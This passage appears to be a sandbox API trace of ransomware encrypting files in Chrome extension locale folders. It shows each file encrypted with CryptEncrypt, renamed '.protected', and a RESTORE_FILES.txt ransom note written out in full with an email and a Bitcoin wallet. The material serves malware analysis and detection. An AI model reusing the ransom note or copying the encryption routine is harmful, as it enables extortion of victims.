cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru") returned 145 [0081.173] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0081.173] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0081.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*") returned 147 [0081.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.174] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0081.174] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.174] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.174] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.174] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\.") returned 147 [0081.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.174] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.174] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.174] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.174] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.174] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.174] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\..") returned 148 [0081.174] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.174] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0081.174] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.174] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.174] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.175] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.175] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.175] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.175] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x30f, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffcf1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.176] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x30f, lpOverlapped=0x0) returned 1 [0081.177] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.177] CloseHandle (hObject=0x168) returned 1 [0081.177] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.protected") returned 169 [0081.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.protected")) returned 1 [0081.178] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.178] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.178] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\RESTORE_FILES.txt") returned 163 [0081.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.179] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.179] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.180] lstrlenA (lpString="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") returned 684 [0081.180] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0081.180] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.180] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.180] CloseHandle (hObject=0x164) returned 1 [0081.180] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0081.180] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk") returned 145 [0081.180] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0081.180] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0081.180] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*") returned 147 [0081.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.180] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.180] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.181] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.181] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.181] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\.") returned 147 [0081.181] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.181] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.181] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.181] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.181] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.181] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.181] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\..") returned 148 [0081.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.181] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.181] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.181] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.181] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.185] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.185] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.185] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.185] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29f, lpOverlapped=0x0) returned 1 [0081.187] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.187] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29f, lpOverlapped=0x0) returned 1 [0081.187] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.187] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.187] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.187] CloseHandle (hObject=0x168) returned 1 [0081.187] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.protected") returned 169 [0081.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.protected")) returned 1 [0081.188] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.188] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.188] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\RESTORE_FILES.txt") returned 163 [0081.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.189] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.189] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.190] lstrlenA (lpString="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") returned 684 [0081.190] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0081.190] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.190] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.190] CloseHandle (hObject=0x164) returned 1 [0081.190] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0081.190] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl") returned 145 [0081.191] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0081.191] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*") returned 147 [0081.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.191] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.191] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.191] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.191] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.191] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\.") returned 147 [0081.191] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.191] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.191] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.191] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.191] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.191] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.191] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\..") returned 148 [0081.191] lstrcmpW (lpString1="..", 